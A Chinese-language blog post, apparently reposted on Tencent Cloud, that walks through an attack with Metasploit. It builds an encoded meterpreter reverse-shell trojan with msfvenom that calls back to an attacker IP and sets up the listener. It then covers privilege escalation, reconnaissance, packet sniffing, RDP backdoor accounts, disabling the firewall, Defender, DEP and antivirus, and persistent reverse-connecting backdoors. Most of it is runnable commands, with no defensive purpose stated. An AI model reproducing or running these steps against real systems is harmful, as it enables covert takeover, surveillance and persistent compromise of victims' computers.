前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >msfvenom木马生成及运用

msfvenom木马生成及运用

作者头像
网e渗透安全部
发布2022-12-01 15:34:53
9500
发布2022-12-01 15:34:53
举报
文章被收录于专栏:白安全组白安全组

前言:

今天简单给大家分享一下msfvenom。kali中一个经常会用到的框架,今天主要的介绍内容是木马程序的生成和后渗透一些提权。

首先是利用msfvenom生成木马程序

msfvenom -a x86 -platform windows -p windows/meterpreter/reverse_tcp LHOST=黑客端IP LPORT=3344 -b "\x00" -e x86/shikata_ga_nai -f exe > msf.exe

这里生成木马之后转到目标机器中

使用命令

msfdb run

运行软件

到这里我们就需要选择一下我们的监听设备,来监听程序是否上线了

使用命令:

    use exploit/multi/handler

启动监听模块,设置监听载荷

 set payload windows/meterpreter/reverse_tcp

设置一下需要的参数,端口和IP

直接run运行监听启动木马

成功上线

使用

background

命令可以将会话放置后台

使用session -i 1 或者session 1

可以重新载入会话1

可以输入shell转入目标机的cmd中

使用exit返回

使用help来查看有什么能控制他的

使用

screenshot

截图

background之后可以使用jobs查看后台的会话任务进程

使用getuid查看当前用户

使用getsystem可以直接提权,但是如果你的权限不高就需要用到另一个ask模块

use exploit/windows/local/ask

这里就成功拿到了最高权限

查看本地漏洞建议

use post/multi/recon/local_exploit_suggester

进行信息搜集

使用enum模块查看运行了哪些服务

run post/windows/gather/enum_services

使用命令:

run post/windows/gather/checkvm

来查看对方是否是虚拟机

使用命令:

 run post/windows/gather/enum_applications

查看这台计算机安装了哪些应用

使用命令:

run post/windows/gather/dumplinks

查看主机最近进行了哪些操作

使用命令:

run post/windows/gather/enum_patches

查看打了哪些补丁

使用命令:

run scraper

导出所有信息

嗅探流量方式

使用命令:

load sniffer

加载嗅探模块,然后可以进行其他的操作

使用:

sniffer_interfaces

查看所有网卡信息

使用:

 sniffer_start 2

选择网卡来监听

使用:

sniffer_dump 2 2.cap

将捕获到的数据包保存到2.cap

然后可以用wires hark来打开

解包也可以直接通过模块来完成

使用:

    use auxiliary/sniffer/psnuffls
    set pcapfile /root/2.cap
    run

可以解包

开启远程链接

run post/windows/manage/enable_rdp

开启远程桌面并创建一个新的用户

run getgui -u username -p password

开启远程桌面并绑定8888端口

run getgui -e -f 8888

然后可以使用kali远程链接桌面

rdesktop -u 用户名 -p 密码 目标IP

关闭防火墙开启3389

netsh advfirewall set allprofiles state off

关闭windefend

net stop windefend

关闭dep(数据执行保护)

bcdeit.exe /set {current} nx AlwaysOff

关闭kali中的杀软

run killav

开机启动型后门

run persistence -A -S -U -i 60 -p 4321(端口) -r 黑客IP

或者

run persistence -X -i 60 -p 4321 -r 黑客IP

-X是开机自启

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2022-11-23,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 白安全组 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档